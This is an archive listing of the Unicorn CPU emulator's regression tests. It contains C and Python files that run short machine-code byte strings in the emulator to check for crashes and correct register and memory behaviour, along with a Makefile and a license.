����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/001-bad_condition_code_0xe.c��������������������������������������������0000664�0000000�0000000�00000002215�14675241067�0023024�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_ARM #define HARDWARE_MODE 16 #define MEMORY_STARTING_ADDRESS 8192 #define MEMORY_SIZE 4096 #define MEMORY_PERMISSIONS 6 #define BINARY_CODE "\x56\xe8\x46\x46\x80\xf6\x8c\x56\xff\xbf\xcd\x90\xda\xa0\xed\xe8\x46\x43\x45\xe5\x80\x90\x44\x46\x04" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0.c�����0000664�0000000�0000000�00000002140�14675241067�0032752�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_M68K #define HARDWARE_MODE 1073741824 #define MEMORY_STARTING_ADDRESS 8388608 #define MEMORY_SIZE 2097152 #define MEMORY_PERMISSIONS 7 #define BINARY_CODE "\xaf\x80\x4e\x7b\xff\xfb\x80\x4e\x3e\x80" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, 
hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/003-qemu__fatal__wdebug_not_implemented.c�������������������������������0000664�0000000�0000000�00000002117�14675241067�0025701�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_M68K #define HARDWARE_MODE 1073741824 #define MEMORY_STARTING_ADDRESS 1048576 #define MEMORY_SIZE 403456 #define MEMORY_PERMISSIONS 7 #define BINARY_CODE "\x42\xc7\xfb\xfb\x54\x36" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/004-segmentation_fault_1.c����������������������������������������������0000664�0000000�0000000�00000002134�14675241067�0022575�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_ARM #define HARDWARE_MODE 16 #define MEMORY_STARTING_ADDRESS 1024 #define MEMORY_SIZE 1796096 #define MEMORY_PERMISSIONS 7 #define BINARY_CODE "\x20\xbf\xbf\xbf\xbf\xdd\x5d\x74\x5e\x66\x72\x10" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) 
called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/005-qemu__fatal__illegal_instruction__0000___00000404.c�����������������0000664�0000000�0000000�00000002075�14675241067�0027303�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_M68K #define HARDWARE_MODE 1073741824 #define MEMORY_STARTING_ADDRESS 1024 #define MEMORY_SIZE 1044480 #define MEMORY_PERMISSIONS 5 #define BINARY_CODE "\x4c\x4c" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } 
�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/006-qemu__fatal__illegal_instruction__0421___00040026.c�����������������0000664�0000000�0000000�00000002462�14675241067�0027317�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_M68K #define HARDWARE_MODE 1073741824 #define MEMORY_STARTING_ADDRESS 262144 #define MEMORY_SIZE 403456 #define MEMORY_PERMISSIONS 7 #define BINARY_CODE "\xe2\x86\x09\xbc\xf2\x17\x09\xca\xca\xca\xca\x09\x09\x09\xf2\x17\x09\x20\x09\x09\xf2\x08\x09\x03\x09\xca\x6b\x6b\x6b\x1e\xca\xca\x86\x09\x09\xf2\x17\x09\x04\x21\x09\x09\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf2" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/00opcode_uc_crash.c�����������������������������������������������������0000664�0000000�0000000�00000003306�14675241067�0021446�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdlib.h> #include <stdio.h> #include <assert.h> #include <unicorn/unicorn.h> #define X86_CODE32 "\x00" // add byte ptr ds:[eax],al #define ADDRESS 0x1000000 static void VM_exec(void) { uc_engine *uc; uc_err err; uint32_t tmp; unsigned int r_eax; r_eax = 0x1000008; // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if(err) { printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); return; } err = uc_mem_map(uc, ADDRESS, (4 * 1024 * 1024), UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory %s\n", 
uc_strerror(err)); return; } // write machine code to be emulated to memory err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); if(err != UC_ERR_OK) { printf("Failed to write emulation code to memory, quit!: %s(len %zu)\n", uc_strerror(err), sizeof(X86_CODE32) - 1); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); if(err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); uc_close(uc); return; } if (!uc_mem_read(uc, ADDRESS+8, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%08X] = 0x%08X\n", ADDRESS+8, tmp); //should contain the byte '8' else printf(">>> Failed to read 4 bytes from [0x%08X]\n", ADDRESS+8); uc_close(uc); puts("No crash. Yay!"); } int main(int argc, char *argv[]) { VM_exec(); return 0; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/LICENSE�����������������������������������������������������������������0000664�0000000�0000000�00000003230�14675241067�0017023�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������This is the software license for Unicorn regression tests. The regression tests are written by several Unicorn contributors (See CREDITS.TXT) and maintained by Hoang-Vu Dang <dang.hvu@gmail.com> Copyright (c) 2015, Unicorn contributors All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the developer(s) nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
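One more note on 00opcode_uc_crash.c above: X86_CODE32 is a single 0x00 byte, and since freshly mapped Unicorn memory reads as zero, the CPU decodes the two bytes 00 00, i.e. "add byte ptr [eax], al" as the test's own comment says. With EAX preset to 0x1000008, the store adds AL (0x08, the low byte of EAX) to the zero byte at ADDRESS+8, which is why the test expects to read back 8 there. A worked check of that arithmetic (standalone, not part of the test):

/* Worked expectation for 00opcode_uc_crash.c: opcode 00 00 is
 * "add byte ptr [eax], al" (matching the comment in the test). */
#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint32_t eax = 0x1000008;     /* points at ADDRESS + 8         */
    uint8_t  al  = (uint8_t)eax;  /* low byte of EAX = 0x08        */
    uint8_t  mem = 0;             /* freshly mapped memory is zero */
    mem = (uint8_t)(mem + al);    /* effect of add [eax], al       */
    printf("dword at 0x%08X should read 0x%08X\n", eax, (uint32_t)mem);
    return 0;                     /* prints ... 0x00000008         */
}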
unicorn-2.1.1/tests/regress/Makefile

CFLAGS += -Wall -Werror -I../../include
CFLAGS += -D__USE_MINGW_ANSI_STDIO=1
LDLIBS += -L../../ -lm -lunicorn
UNAME_S := $(shell uname -s)
LDLIBS += -pthread
ifeq ($(UNAME_S), Linux)
LDLIBS += -lrt
endif

EXECUTE_VARS = LD_LIBRARY_PATH=../../cmocka/src:../../ DYLD_LIBRARY_PATH=../../

TESTS_SOURCE = $(wildcard *.c)
TESTS = $(TESTS_SOURCE:%.c=%)

.PHONY: all clean test

test: $(TESTS)

all: $(TESTS)

clean:
	rm -f $(TESTS)

unicorn-2.1.1/tests/regress/arm64_reg_rw_w0_w30.py

#!/usr/bin/python
from unicorn import *
from unicorn.arm64_const import *
from unicorn.x86_const import *

import regress

class Arm64RegReadWriteW0ThroughW30(regress.RegressTest):
    """
    Testing the functionality to read/write 32-bit registers in AArch64
    See issue #716
    """
    def runTest(self):
        uc = Uc(UC_ARCH_ARM64, UC_MODE_ARM)

        uc.reg_write(UC_ARM64_REG_X0, 0x1234567890abcdef)
        self.assertEquals(uc.reg_read(UC_ARM64_REG_X0), 0x1234567890abcdef)
        self.assertEquals(uc.reg_read(UC_ARM64_REG_W0), 0x90abcdef)

        uc.reg_write(UC_ARM64_REG_X30, 0xa1b2c3d4e5f6a7b8)
        self.assertEquals(uc.reg_read(UC_ARM64_REG_W30), 0xe5f6a7b8)

        uc.reg_write(UC_ARM64_REG_W30, 0xaabbccdd)
        self.assertEquals(uc.reg_read(UC_ARM64_REG_X30), 0xa1b2c3d4aabbccdd)
        self.assertEquals(uc.reg_read(UC_ARM64_REG_W30), 0xaabbccdd)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/arm_bx_unmapped.py

from __future__ import print_function
from unicorn import *
from unicorn.arm_const import *
import regress

# code to be emulated
'''
ins = {
    0x00008cd4: """
        push    {r11}
        add     r11, sp, #0
        mov     r3, pc
        mov     r0, r3
        sub     sp, r11, #0
        pop     {r11}
        bx      lr
    """,
    0x00008cf0: """
        push    {r11}
        add     r11, sp, #0
        push    {r6}
        add     r6, pc, $1
        bx      r6
        .code   16
        mov     r3, pc
        add     r3, $0x4
        push    {r3}
        pop     {pc}
        .code   32
        pop     {r6}
        mov     r0, r3
        sub     sp, r11, #0
        pop     {r11}
        bx      lr
    """,
    0x00008d20: """
        push    {r11}
        add     r11, sp, #0
        mov     r3, lr
        mov     r0, r3
        sub     sp, r11, #0
        pop     {r11}
        bx      lr
    """,
    0x00008d68: "bl 0x8cd4\n"
                "mov r4, r0\n"
                "bl 0x8cf0\n"
                "mov r3, r0\n"
                "add r4, r4, r3\n"
                "bl 0x8d20\n"
                "mov r3, r0\n"
                "add r2, r4, r3",
}
'''

class BxTwiceTest(regress.RegressTest):
    def runTest(self):
        ADDRESS = 0x8000
        MAIN_ADDRESS = 0x8d68
        STACK_ADDR = ADDRESS + 0x1000

        code = {
            0x8cf0: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x04`-\xe5\x01`\x8f\xe2\x16\xff/\xe1{F\x03\xf1\x04\x03\x08\xb4\x00\xbd\x00\x00\x04`\x9d\xe4\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1',
            0x8d20: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x0e0\xa0\xe1\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1',
            0x8cd4: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x0f0\xa0\xe1\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1',
            0x8d68: '\xd9\xff\xff\xeb\x00@\xa0\xe1\xde\xff\xff\xeb\x000\xa0\xe1\x03@\x84\xe0\xe7\xff\xff\xeb\x000\xa0\xe1\x03 \x84\xe0'
        }

        try:
            mu = Uc(UC_ARCH_ARM, UC_MODE_ARM)

            # map 2MB memory for this emulation
            mu.mem_map(ADDRESS, 2 * 1024 * 1024)

            # write machine code to be emulated to memory
            for addr, c in code.items():
                print("Writing chunk to 0x{:x}".format(addr))
                mu.mem_write(addr, c)

            # initialize machine registers
            mu.reg_write(UC_ARM_REG_SP, STACK_ADDR)

            print("Starting emulation")
            # emulate code in infinite time & unlimited instructions
            mu.emu_start(MAIN_ADDRESS, MAIN_ADDRESS + len(code[MAIN_ADDRESS]))

            print("Emulation done")

            r2 = mu.reg_read(UC_ARM_REG_R2)
            print(">>> r2: 0x{:08x}".format(r2))

        except UcError as e:
            self.fail("ERROR: %s" % e)

unicorn-2.1.1/tests/regress/arm_bxeq_hang.py

#!/usr/bin/python
from unicorn import *
from unicorn.arm_const import *
import regress

class BxHang(regress.RegressTest):
    def runTest(self):
        uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)
        uc.mem_map(0x1000, 0x1000)
        uc.mem_write(0x1000, '1eff2f010000a0e1'.decode('hex'))  # bxeq lr; mov r0, r0
        uc.count = 0

        def hook_block(uc, addr, *args):
            print 'enter block 0x%04x' % addr
            uc.count += 1

        uc.reg_write(UC_ARM_REG_LR, 0x1004)
        uc.hook_add(UC_HOOK_BLOCK, hook_block)
        print 'block should only run once'
        uc.emu_start(0x1000, 0x1004)

        self.assertEqual(uc.count, 1)

if __name__ == '__main__':
    regress.main()
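arm_bxeq_hang.py above is written for Python 2: both the print statement and str.decode('hex') are gone in Python 3. For reference, a Python 3 rendering of its setup would use binascii.unhexlify (a sketch only, not part of the test suite):

    import binascii
    from unicorn import Uc, UC_ARCH_ARM, UC_MODE_ARM

    uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)
    uc.mem_map(0x1000, 0x1000)
    # binascii.unhexlify replaces the Python-2-only str.decode('hex')
    uc.mem_write(0x1000, binascii.unhexlify('1eff2f010000a0e1'))  # bxeq lr; mov r0, r0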
unicorn-2.1.1/tests/regress/arm_enable_vfp.c

#include <unicorn/unicorn.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define ADDRESS 0x1000
#define ARM_VMOV "\xC0\xEF\x10\x00" // VMOV.I32 D16, #0 ; Vector Move

int main(void)
{
    uc_engine *uc;
    uc_err err;

    err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc);
    if (err) {
        printf("uc_open %d\n", err);
        return 1;
    }

    uint64_t tmp_val;
    err = uc_reg_read(uc, UC_ARM_REG_C1_C0_2, &tmp_val);
    if (err) {
        printf("uc_reg_read %d\n", err);
        return 1;
    }

    tmp_val = tmp_val | (0xf << 20);
    err = uc_reg_write(uc, UC_ARM_REG_C1_C0_2, &tmp_val);
    if (err) {
        printf("uc_reg_write %d\n", err);
        return 1;
    }

    size_t enable_vfp = 0x40000000;
    err = uc_reg_write(uc, UC_ARM_REG_FPEXC, &enable_vfp);
    if (err) {
        printf("uc_reg_write %d\n", err);
        return 1;
    }

    err = uc_mem_map(uc, ADDRESS, 4 * 1024, UC_PROT_ALL);
    if (err) {
        printf("uc_mem_map %d\n", err);
        return 1;
    }

    err = uc_mem_write(uc, ADDRESS, ARM_VMOV, sizeof(ARM_VMOV) - 1);
    if (err) {
        printf("uc_mem_write %s\n", uc_strerror(err));
        return 1;
    }

    err = uc_emu_start(uc, ADDRESS, 0, 0, 1);
    if (err) {
        printf("uc_emu_start: %s\n", uc_strerror(err));
        return 1;
    }

    printf("Success\n");
    uc_close(uc);
    return 0;
}

unicorn-2.1.1/tests/regress/arm_fp_vfp_disabled.py

#!/usr/bin/python
# coding=utf8

# Added by Peter Mackay, relating to issue 571
# "ARM NEON/VFP support seems to exist but is disabled by default"
# https://github.com/unicorn-engine/unicorn/issues/571

from unicorn import *
from unicorn.arm_const import *
import regress

class FpVfpDisabled(regress.RegressTest):
    def runTest(self):
        # MRC p15, #0, r1, c1, c0, #2
        # ORR r1, r1, #(0xf << 20)
        # MCR p15, #0, r1, c1, c0, #2
        # MOV r1, #0
        # MCR p15, #0, r1, c7, c5, #4
        # MOV r0,#0x40000000
        # FMXR FPEXC, r0
        code = '11EE501F'
        code += '41F47001'
        code += '01EE501F'
        code += '4FF00001'
        code += '07EE951F'
        code += '4FF08040'
        code += 'E8EE100A'
        # vpush {d8}
        code += '2ded028b'

        address = 0x1000
        mem_size = 0x1000
        code_bytes = code.decode('hex')

        uc = Uc(UC_ARCH_ARM, UC_MODE_THUMB)
        uc.mem_map(address, mem_size)
        uc.mem_write(address, code_bytes)
        uc.reg_write(UC_ARM_REG_SP, address + mem_size)
        uc.emu_start(address + 1, address + len(code_bytes))

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/arm_init_input_crash.py

#!/usr/bin/env python
# Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com>
#

from __future__ import print_function
from unicorn import *
from unicorn.arm_const import *

# code to be emulated
ARM_CODE   = "\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3
THUMB_CODE = "\x83\xb0" # sub sp, #0xc

# memory address where emulation starts
ADDRESS = 0xF0000000

# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" % (address, size))

# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = %u" % (address, size))

# Test ARM
def test_arm():
    print("Emulate ARM code")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_ARM)

        mem_size = 2 * (1024 * 1024)
        mu.mem_map(ADDRESS, mem_size)

        stack_address = ADDRESS + mem_size
        stack_size = stack_address  # >>> here huge memory size
        mu.mem_map(stack_address, stack_size)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, ARM_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM_REG_R0, 0x1234)
        mu.reg_write(UC_ARM_REG_R2, 0x6789)
        mu.reg_write(UC_ARM_REG_R3, 0x3333)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r0 = mu.reg_read(UC_ARM_REG_R0)
        r1 = mu.reg_read(UC_ARM_REG_R1)
        print(">>> R0 = 0x%x" % r0)
        print(">>> R1 = 0x%x" % r1)

    except UcError as e:
        print("ERROR: %s" % e)

def test_thumb():
    print("Emulate THUMB code")
    try:
        # Initialize emulator in thumb mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, THUMB_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM_REG_SP, 0x1234)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(THUMB_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        sp = mu.reg_read(UC_ARM_REG_SP)
        print(">>> SP = 0x%x" % sp)

    except UcError as e:
        print("ERROR: %s" % e)

if __name__ == '__main__':
    test_arm()
    print("=" * 20)
    test_thumb()

unicorn-2.1.1/tests/regress/arm_memcpy_neon.py

from unicorn import *
from unicorn.arm_const import *

# .text:0001F894 ADD PC, PC, R3
# .text:0001F898 ; ---------------------------------------------------------------------------
# .text:0001F898 VLD1.8 {D0}, [R1]!
# .text:0001F89C VST1.8 {D0}, [R12]!
# .text:0001F8A0 VLD1.8 {D0}, [R1]!
# .text:0001F8A4 VST1.8 {D0}, [R12]!
# .text:0001F8A8 VLD1.8 {D0}, [R1]!
# .text:0001F8AC VST1.8 {D0}, [R12]!
# .text:0001F8B0 VLD1.8 {D0}, [R1]!
# .text:0001F8B4 VST1.8 {D0}, [R12]!
# .text:0001F8B8 VLD1.8 {D0}, [R1]!
# .text:0001F8BC VST1.8 {D0}, [R12]!
# .text:0001F8C0 VLD1.8 {D0}, [R1]!
# .text:0001F8C4 VST1.8 {D0}, [R12]!
# .text:0001F8C8 VLD1.8 {D0}, [R1]!
# .text:0001F8CC VST1.8 {D0}, [R12]!
# .text:0001F8D0 TST R2, #4
# .text:0001F8D4 LDRNE R3, [R1],#4
# .text:0001F8D8 STRNE R3, [R12],#4
# .text:0001F8DC MOVS R2, R2,LSL#31
# .text:0001F8E0 LDRHCS R3, [R1],#2
# .text:0001F8E4 LDRBNE R1, [R1]
# .text:0001F8E8 STRHCS R3, [R12],#2
# .text:0001F8EC STRBNE R1, [R12]
shellcode = [0x3, 0xf0, 0x8f, 0xe0, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4,
             0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4,
             0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4,
             0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4,
             0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4,
             0x4, 0x0, 0x12, 0xe3, 0x4, 0x30, 0x91, 0x14, 0x4, 0x30, 0x8c, 0x14,
             0x82, 0x2f, 0xb0, 0xe1, 0xb2, 0x30, 0xd1, 0x20, 0x0, 0x10, 0xd1, 0x15,
             0xb2, 0x30, 0xcc, 0x20, 0x0, 0x10, 0xcc, 0x15]
base = 0x1F894
from_address = 0x1000
to_address = 0x2000
cplen = 8
bs = b"c8"*cplen

uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)
uc.mem_map(from_address, 0x1000)
uc.mem_map(to_address, 0x1000)
uc.mem_map(0x1F000, 0x1000)
uc.mem_write(from_address, bs)
uc.mem_write(base, bytes(shellcode))
uc.reg_write(UC_ARM_REG_R12, to_address)
uc.reg_write(UC_ARM_REG_R1, from_address)
